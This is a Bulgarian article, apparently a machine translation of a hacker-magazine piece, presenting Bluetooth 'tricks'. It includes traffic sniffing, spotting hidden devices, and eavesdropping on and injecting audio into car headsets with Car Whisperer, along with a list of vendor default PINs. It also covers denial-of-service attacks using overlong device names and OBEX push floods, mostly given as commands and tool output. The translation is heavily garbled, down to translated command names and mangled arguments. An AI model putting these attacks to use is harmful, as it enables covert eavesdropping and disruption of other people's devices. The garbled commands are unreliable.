Трикове с Bluetooth малки трикове използват "син зъб"
Всеки знае, че с помощта на Bluetooth, можете да прехвърлите файла от устройството на устройството или да се свържете с безжични слушалки. Но тези възможности не се ограничават до това. Като взе със себе си най-подходящия инструмент, можете да създадете истински чудеса. Така че защо не опитате себе си като магьосник?
Вградена технология Bluetooth (или още по-формално IEEE 802.15.3) за дълго време е престанало да бъде рядкост. разходите за единица продукция е толкова оскъдна, че не го вградите в мобилния си телефон, лаптоп или PDA просто мързеливи производител. И след това - за маркетингови причини. С една дума, Bluetooth се използва в почти всички. Но само малцина знаят, че, като се използва технология, риск да дадат своите поверителни данни. Но нека да започнем всичко Същото е и с доброто!
Трик 1: Използване на BT за отдалечен достъп до компютъра
Трик 2: Контрол на достъпа с BT
Трик 3: BT-Snifaem трафик от етер
Майсторство започва с разбиране. Тя не възниква, ако някога имате желание да се погледне в протокола и да научат как данните да се актуализират чрез "син зъб"? Bluetooth Слушане на трафик може да се извършва само "само по себе си", която се извършва, за да прихванат входящи и изходящи трафик възел, където ви дам команди. В този случай, съществено значение е т.нар хост контролер интерфейс (HCI), което позволява достъп до предавателя. HCI-възел обикновено е свързан с водача устройство Bluetooth възел (надолу) и L2CAP възел (нагоре). подразбиране Windows платформа не предвижда такава възможност. Въпреки това, програмисти на трети страни са били освободени
специален драйвер, който позволява да преведат стандартната приставка в специално обучени. Традиционно показателен в това отношение е работата FTS4BT Wireless Bluetooth протокол анализатор. застанал състояние. Продукт докосвания, който поддържа новата Bluetooth v2.0 + EDR. въз основа на които съвременните устройства работят и, освен това, е в състояние да лети декодиране на целия трафик от въздуха, леко otsortirovyvaya аудио, данни, приложения, протоколи и др. Ясно е, че за смъркане (и като цяло) са най-подходящи USB донгъл-клас 1, чийто обхват достига сто метра.
Трик 4: Работа директно с BT-адаптер
Дълго време Bluetooth стека за Windows осигурява толкова оскъдни възможности. че програмисти просто прескочени страната на перона. Това обяснява защо повечето от програмите за сериозни забавно С «син зъб", разработен от niksovuyu платформа. Някои от торбата с трикове ние го обсъдим в тази платформа, а именно FreeBSD (Напомням ви, че диска последен въпрос, ние изложени свеж 7.0 освобождаване на операционната система). Самата технология Bluetooth стана поддържа официално в него само с петата власт въз основа на подсистема Netgraph. Радвам се, че по-голямата част от USB-адаптери са съвместими с ng_ubt шофьор (необходимо е да имате връзка с устройството). Нека се опитаме?
- Свържете устройството: kldload ng_ubt
- Копирайте стека на скрипт podgruzki на удобно място: ср /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
- Копирайте стека на скрипт podgruzki в удобно място и стартирайте: од /usr/local/etc/rc.bluetoots започват ubt0
Сега искам да ви запозная с hccontrol полезност. Това е една от основните програми за BT-модул. Именно тя извършва всички операции, свързани с интерфейса HCI, и има следния синтаксис: hccontrol -н <имя_hci_узла> <команда>. Тестване на функционалността на нашите устройства ще сканира въздуха за наличие на устройствата:
hccontrol -н ubt0hci Запитване
Трик 5: Намерете скритите устройства
Друг вариант - е да се използват техники за пасивно. превежда устройството си в режим на готовност, а мрежата да зададе някои привлекателни име:
hciconfig име hci0 BT_YANDEX
hciconfig hci0 надолу
hciconfig hci0 нагоре
hcidump -V | Впиши bdaddr
Резултатът показва всички входящи връзки, сред които могат да бъдат лесно се среща със скрити идентификатори.
Трик 6: подслушване на разговори в слушалките етер
Една от основните заплахи за радио технология е, че данните могат да бъдат засечени. Първото нещо, което идва на ум по отношение на Bluetooth - за да слушате хората говорят, с помощта на слушалки. И често това е реално! На хакер фестивал Какво рана в експертите Холандия от Trifinite група демонстрира как да използвате лаптоп с Linux, специална програма и насочена антена може да се подслушва, което се доказва чрез Bluetooth-слушалки шофьор на преминаваща кола. Групата има разработена кола Whisperer програма ( "Car доносник"). функции на програмата са сравнително малки: само слушат тези, които са забравили да промените фабричните настройки по подразбиране парола достъпа до Bluetooth, подобни на
"0000" или "1234". Но тези нещастници, повярвайте ми, много, много! "Whisper" и е в състояние успешно да мине клин «сдвояването» на устройствата, получаване на информация, предавана или karkita hedseta за мобилни устройства. Искам да привлека вниманието на: полезност ви позволява не само да се получи информация, обменяна между hedsetom и мобилни телефони, но също така се инжектира гърба му. Решихме да тествате възможностите на тази програма, като изтеглите Car Повелителят на сайта на разработчика.
Преди операцията е препоръчително да се промени класа на устройството ви, особено ако програмата се използва с компютъра:
hciconfig адаптер клас 0x500204
# 0x500204 - клас «телефон»
В противен случай, някои "умни" супа може да подушвам нещо нередно. Гледайте полезност синтаксис, който изглежда по следния начин:
Ние сме внедрили от файла директно от папката Utilities и като продукцията е посочено out.raw:
/ Carwhisperer 0 message.raw /tmp/out.raw
00: 15: 0E: 91: 19: 73
Изходът е out.raw файл. Чуйте го в чист вид е невъзможно: да се превърнат в аудио формат, което ще изисква допълнително полезност. Поставете доста аудио конвертори, например Сокс.
суров -r 8000 -c 1 -s -w out.raw -t WAV -r
44 100 С2 out.wav
На практика тя изглежда по следния начин. Първо търсенето на активен комплект чрез «търсене sdptool HS» команда, която дава приблизително отговора:
Питане.
Търсене HS на 00: 0A: 3A: 54: 71: 95.
Service Име: Слушалки
Service RecHandle: 0x10009
Service клас ID списък:
"Слушалки" (0x1108)
"Общи Аудио" (0x1203)
Списък Descriptor протокол:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Канал: 7
Списък на езиковите Base ATTR:
code_ISO639: 0x656e
кодираща: 0x6a
base_offset: 0x100
Профил дескриптори на списъка:
"Слушалки" (0x1108)
Версия: 0x0100
Nokia (00: 02 :. EE) - пинов = "5475"
Audi UHV (00: 0E :. 9F) - пинов = "1234"
O'Neill (00:80:37.) - щифт = "8761"
Cellink (00: 0A :. 94) - пинов = "1234"
Eazix (00: 0 ° С :. 84) - щифт = "1234"
Трик 7: DDoS BT-устройства
hciconfig име hci0 `Perl -e" печат "пепел" х 3137'`
# Командата за Linux
hccontrol -н адаптер change_local_name "ново име")
# Пример за Свободен
- Първо, "бомба". Добре известен пример:
ехо печат "skvz" `Perl -e" х 3137'`> файл - След това използвайте модифицирана програма, за да комуникира с Obex - USSP PUSH (xmailserver.org/ussp-push.html)
./ Obextool тласък файл 00: 0A: 3A: 54: 71: 95 печат "skvz" `Perl -e" х 3 3137'`